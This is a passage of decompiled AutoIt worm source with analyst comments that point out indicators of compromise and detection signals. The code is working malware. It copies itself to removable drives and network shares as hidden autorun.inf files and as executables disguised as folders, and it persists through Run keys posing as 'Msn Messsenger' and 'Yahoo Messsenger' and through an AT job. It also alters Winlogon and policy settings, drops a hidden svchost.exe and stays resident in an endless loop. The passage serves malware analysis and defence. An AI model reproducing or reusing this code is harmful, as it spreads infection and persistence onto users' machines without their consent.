  303. a140030003034("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" & "svchost " & ".exe")
  304. a5b00b000b003()
  305. a55005000501f()
  306. a390060006024()
  ; Share propagation runs when the "shared" marker is missing, or when the file it
  ; points to no longer exists.
  307. If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") = "" Then
  308. a2200a000a01f()
  309. EndIf
  310. If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") <> "" Then
  311. If FileExists(RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared")) = 0 Then
  312. a2200a000a01f()
  313. EndIf
  314. EndIf
  ; Four attempts, one second apart, to terminate a process named game_y.exe.
  ; What game_y.exe is cannot be determined from this listing.
  315. If ProcessExists("game_y.exe") Then
  316. ProcessClose("game_y.exe")
  317. EndIf
  318. Sleep(1000)
  319. If ProcessExists("game_y.exe") Then
  320. ProcessClose("game_y.exe")
  321. EndIf
  322. Sleep(1000)
  323. If ProcessExists("game_y.exe") Then
  324. ProcessClose("game_y.exe")
  325. EndIf
  326. Sleep(1000)
  327. If ProcessExists("game_y.exe") Then
  328. ProcessClose("game_y.exe")
  329. EndIf
  330. Sleep(1000)
  ; Resident loop: never exits.
  331. While (1)
  332. a4e0070007039()
  333. a630080008039()
  334. If @HOUR = $hour Then
  335. a55005000501f()
  336. If ProcessExists("game_y.exe") Then
  337. ProcessClose("game_y.exe")
  338. EndIf
  339. Sleep(1000)
  340. If ProcessExists("game_y.exe") Then
  341. ProcessClose("game_y.exe")
  342. EndIf
  343. Sleep(1000)
  344. If ProcessExists("game_y.exe") Then
  345. ProcessClose("game_y.exe")
  346. EndIf
  347. Sleep(1000)
  348. If ProcessExists("game_y.exe") Then
  349. ProcessClose("game_y.exe")
  350. EndIf
  351. Sleep(1000)
  352. EndIf
  353. If @MIN = $min Then
  354. a390060006024()
  355. EndIf
  356. WEnd
  357. EndFunc
  358.  
  ; Analyst note: cleanup routine, invoked from the top-level code only when the process
  ; is admin and @WindowsDir\winhelp.ini exists. It removes setup.ini, regsvr.exe and
  ; winhelp.exe / winhelp.ini, renames rundll.exe to delete.exe in the system directory,
  ; resets Winlogon\Shell to "Explorer.exe ", deletes the "Msn Messsenger" Run value and
  ; sets DisableRegistryTools back to 0.
  ; Because funmain() runs immediately afterwards and installs everything again, this
  ; looks like replacement of an earlier install (the winhelp.* names) rather than a
  ; self-removal feature - treat that reading as an inference.
  ; The file names here (winhelp.exe, winhelp.ini, rundll.exe, delete.exe) are additional
  ; artefacts to look for on hosts that may carry an older variant.
  359. Func delete()
  360. FileDelete(@SystemDir & "\setup.ini")
  ; FileMove flag 9 = overwrite existing (1) + create destination directory (8).
  361. FileMove(@SystemDir & "\" & "rundll" & ".exe", @SystemDir & "\" & "delete" & ".exe", 9)
  362. FileDelete(@SystemDir & "\setup.ini")
  363. If FileExists(@SystemDir & "\" & "regsvr" & ".exe") Then
  364. FileDelete(@SystemDir & "\" & "regsvr" & ".exe")
  365. EndIf
  366. If FileExists(@SystemDir & "\" & "winhelp" & ".exe") Then
  367. FileDelete(@SystemDir & "\" & "winhelp" & ".exe")
  368. EndIf
  369. If FileExists(@WindowsDir & "\" & "regsvr" & ".exe") Then
  370. FileDelete(@WindowsDir & "\" & "regsvr" & ".exe")
  371. EndIf
  372. If FileExists(@WindowsDir & "\" & "winhelp" & ".ini") Then
  373. FileDelete(@WindowsDir & "\" & "winhelp" & ".ini")
  374. EndIf
  375. RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
  376. RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe ")
  377. RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger")
  378. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 0)
  379. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 0)
  380. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 0)
  381. RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)
  382. EndFunc
  383.  
  ; Analyst note: removable-media propagation for the non-admin code path. Same logic
  ; as the admin routine a630080008039(), but every source file comes from the user's
  ; @AppDataDir (regsvr.exe and setup.ini) instead of the Windows/system directories,
  ; and sub-folders are seeded through removablerestrictsupport().
  ; Files written to the drive root: "New Folder .exe", regsvr.exe, hidden autorun.inf.
  ; Relevance for defenders: the worm still spreads via USB media when the user has no
  ; administrative rights, so least privilege alone does not contain it.
  384. Func removablerestrict()
  385. $a571230123018 = DriveGetDrive("REMOVABLE")
  386. If NOT @error Then
  387. Dim $gdimarr0001[6]
  388. $gdimarr0001[1] = ""
  389. For $a4f00f000f042 = 1 To $a571230123018[0]
  390. $gdimarr0001[$a4f00f000f042 - 1] = $a571230123018[$a4f00f000f042]
  391. Next
  ; Case 1: first removable drive is not A:.
  392. If $gdimarr0001[0] <> "A:" Then
  393. If $gdimarr0001[0] <> "" Then
  394. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\New Folder .exe", 0)
  395. Sleep(1)
  396. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[0] & "\" & "regsvr" & ".exe", 0)
  397. Sleep(1)
  398. FileCopy(@AppDataDir & "\setup.ini", $gdimarr0001[0] & "\autorun.inf", 0)
  399. FileSetAttrib($gdimarr0001[0] & "\autorun.inf", "+RSH")
  400. Sleep(1)
  401. removablerestrictsupport($gdimarr0001[0])
  402. EndIf
  403. EndIf
  ; Case 2: first entry is A:, so the second removable drive (if any) is used.
  404. If $gdimarr0001[0] = "A:" Then
  405. If $gdimarr0001[1] <> "" Then
  406. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\New Folder .exe", 0)
  407. Sleep(1)
  408. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0001[1] & "\" & "regsvr" & ".exe", 0)
  409. Sleep(1)
  410. FileCopy(@AppDataDir & "\setup.ini", $gdimarr0001[1] & "\autorun.inf", 0)
  411. FileSetAttrib($gdimarr0001[1] & "\autorun.inf", "+RSH")
  412. Sleep(1)
  413. removablerestrictsupport($gdimarr0001[1])
  414. EndIf
  415. EndIf
  416. EndIf
  417. EndFunc
  418.  
  ; Analyst note: recursive folder-masquerade helper for the non-admin code path.
  ; Identical in structure to a1b0090009002(), except the source binary is
  ; @AppDataDir\regsvr.exe. For each directory under $arg00 it drops "<dirname> .exe"
  ; inside that directory, deletes "<dirname>.exe", and recurses.
  ; The name test ($x <> "." OR $x <> "..") is true for any string, so it filters nothing.
  419. Func removablerestrictsupport($arg00)
  420. Local $var0000 = FileFindFirstFile($arg00 & "\*.*")
  421. While 1
  422. Dim $gdimvar0002 = FileFindNextFile($var0000)
  423. If @error OR StringLen($gdimvar0002) < 1 Then ExitLoop
  424. If StringInStr(FileGetAttrib($arg00 & "\" & $gdimvar0002), "D") AND ($gdimvar0002 <> "." OR $gdimvar0002 <> "..") Then
  425. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & " " & ".exe", 0)
  426. FileDelete($arg00 & "\" & $gdimvar0002 & "\" & $gdimvar0002 & ".exe")
  427. removablerestrictsupport($arg00 & "\" & $gdimvar0002)
  428. EndIf
  429. Sleep(1)
  430. WEnd
  431. FileClose($var0000)
  432. EndFunc
  433.  
  ; Analyst note: network-share propagation for the non-admin code path. Mirrors
  ; a2200a000a01f(): enumerates HKCU\...\WorkgroupCrawler\Shares subkeys, converts them
  ; to UNC paths, probes write access by copying @AppDataDir\regsvr.exe as
  ; "New Folder .exe", and on success drops regsvr.exe plus a hidden autorun.inf and
  ; seeds sub-folders via removablerestrictsupport(). Writes the same "shared" marker
  ; value under the Shares key that restrictmain() checks.
  434. Func networkrestrict()
  435. Dim $gdimarr0003[30]
  436. For $a4f00f000f042 = 1 To 30
  437. $a296220622038 = RegEnumKey("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", $a4f00f000f042)
  438. If @error Then ExitLoop
  439. $a296220622038 = StringReplace($a296220622038, "/", "\")
  440. $gdimarr0003[$a4f00f000f042] = "\\" & $a296220622038
  441. $a2b6270627002 = FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\New Folder .exe", 1)
  442. If $a2b6270627002 = 1 Then
  443. FileCopy(@AppDataDir & "\" & "regsvr" & ".exe", $gdimarr0003[$a4f00f000f042] & "\" & "regsvr" & ".exe", 0)
  444. FileCopy(@AppDataDir & "\setup.ini", $gdimarr0003[$a4f00f000f042] & "\autorun.inf", 1)
  445. FileSetAttrib($gdimarr0003[$a4f00f000f042] & "\autorun.inf", "+RSH")
  446. removablerestrictsupport($gdimarr0003[$a4f00f000f042])
  447. EndIf
  448. Next
  449. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared", "REG_SZ", $gdimarr0003[$a4f00f000f042 - 1] & "\New Folder .exe")
  450. EndFunc
  451.  
  ; Analyst note: autorun.inf template for the non-admin code path. Same [Autorun]
  ; entries as a5b00b000b003() (Open, Shellexecute, Shell\Open\command -> regsvr.exe),
  ; written to @AppDataDir\setup.ini and then hidden with +RSH.
  ; IoC: a hidden setup.ini directly under the user's Application Data folder.
  452. Func writeini()
  453. IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Open", "regsvr" & ".exe")
  454. IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Shellexecute", "regsvr" & ".exe")
  455. IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Shell\Open\command", "regsvr" & ".exe")
  456. IniWrite(@AppDataDir & "\setup.ini", "Autorun", "Shell", "Open")
  457. Sleep(1)
  458. FileSetAttrib(@AppDataDir & "\setup.ini", "+RSH")
  459. EndFunc
  460.  
  ; Analyst note: installation routine for the non-admin code path. Everything lands
  ; in the user profile instead of the system directory:
  ;   - @AppDataDir\support\svchost.exe and svchost.001 (extracted from the compiled
  ;     script via FileInstall, then hidden with +RSH; contents not shown in this listing)
  ;   - @AppDataDir\regsvr.exe (copy of the running binary)
  ; The dropped support\svchost.exe is launched unless the HKCU Run value
  ; "Msn Messsenger" already equals @AppDataDir\regsvr.exe (case-sensitive "==").
  ; Detection: svchost.exe executing from a user-profile path is a high-fidelity signal.
  461. Func installrestrict()
  462. Opt("RunErrorsFatal", 0)
  463. DirCreate(@AppDataDir & "\support")
  464. FileInstall("C:\svchost.exe", @AppDataDir & "\support\" & "svchost" & ".exe", 0)
  465. FileInstall("C:\svchost.001", @AppDataDir & "\support\" & "svchost" & ".001", 0)
  466. FileSetAttrib(@AppDataDir & "\support\" & "svchost" & ".exe", "+RSH")
  467. FileSetAttrib(@AppDataDir & "\support\" & "svchost" & ".001", "+RSH")
  468. FileCopy(@AutoItExe, @AppDataDir & "\" & "regsvr" & ".exe", 0)
  469. $12345 = @AppDataDir & "\" & "regsvr" & ".exe"
  470. If NOT (RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger") == $12345) Then
  471. Run(@AppDataDir & "\support\" & "svchost" & ".exe", "")
  472. EndIf
  473. EndFunc
  474.  
  ; Analyst note: persistence for the non-admin code path, using only HKCU (writable
  ; without elevation):
  ;   - Run value "Msn Messsenger"   -> @AppDataDir\regsvr.exe
  ;   - Run value "Yahoo Messsenger" -> @AppDataDir\support\svchost.exe
  ;   - Policies: NofolderOptions = 0, DisableTaskMgr = 0, DisableRegistryTools = 1
  ; Both Run value names carry the same triple-s misspelling, which makes them
  ; convenient registry hunting strings.
  475. Func regeditrestrict()
  476. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger", "REG_SZ", @AppDataDir & "\regsvr" & ".exe")
  477. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yahoo Messsenger", "REG_SZ", @AppDataDir & "\support\" & "svchost" & ".exe")
  478. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 0)
  479. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 0)
  480. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
  481. EndFunc
  482.  
  ; Analyst note: main routine when the process lacks administrator rights.
  ; Installs into the user profile, sets HKCU persistence, writes the autorun
  ; template, sends the messenger lure once, spreads to network shares when the
  ; "shared" marker is missing or stale, then loops forever re-seeding removable drives.
  ; Compared with funmain(): no AT job, no Winlogon\Shell change, no payload download
  ; and no window-closing routine; the @MIN check inside the loop has an empty body.
  483. Func restrictmain()
  484. $hour = @HOUR + 2
  485. $min = @MIN + 30
  486. Opt("RunErrorsFatal", 0)
  487. installrestrict()
  488. regeditrestrict()
  489. writeini()
  490. a390060006024()
  491. If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") = "" Then
  492. networkrestrict()
  493. EndIf
  494. If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") <> "" Then
  495. If FileExists(RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared")) = 0 Then
  496. networkrestrict()
  497. EndIf
  498. EndIf
  ; Four attempts, one second apart, to terminate a process named game_y.exe.
  499. If ProcessExists("game_y.exe") Then
  500. ProcessClose("game_y.exe")
  501. EndIf
  502. Sleep(1000)
  503. If ProcessExists("game_y.exe") Then
  504. ProcessClose("game_y.exe")
  505. EndIf
  506. Sleep(1000)
  507. If ProcessExists("game_y.exe") Then
  508. ProcessClose("game_y.exe")
  509. EndIf
  510. Sleep(1000)
  511. If ProcessExists("game_y.exe") Then
  512. ProcessClose("game_y.exe")
  513. EndIf
  514. Sleep(1000)
  ; Resident loop: never exits.
  515. While (1)
  516. removablerestrict()
  517. If @MIN = $min Then
  518. EndIf
  519. WEnd
  520. EndFunc
  521.  
  ; Analyst note: script entry point. Privilege decides the code path:
  ;   - admin and @WindowsDir\winhelp.ini present -> delete() first (removes the
  ;     winhelp.* / regsvr.exe artefacts listed there)
  ;   - admin     -> funmain()      (system-directory install, HKLM changes, AT job)
  ;   - not admin -> restrictmain() (user-profile install, HKCU-only persistence)
  ; Both main routines end in an infinite loop, so the process stays resident.
  ; Triage therefore has to check both artefact sets: the system directory and HKLM
  ; for elevated infections, %APPDATA% and HKCU for standard-user infections.
  522. Opt("RunErrorsFatal", 0)
  523. If IsAdmin() Then
  524. If FileExists(@WindowsDir & "\" & "winhelp.ini") Then
  525. delete()
  526. EndIf
  527. EndIf
  528. If IsAdmin() Then
  529. funmain()
  530. EndIf
  531. If NOT IsAdmin() Then
  532. restrictmain()
  533. EndIf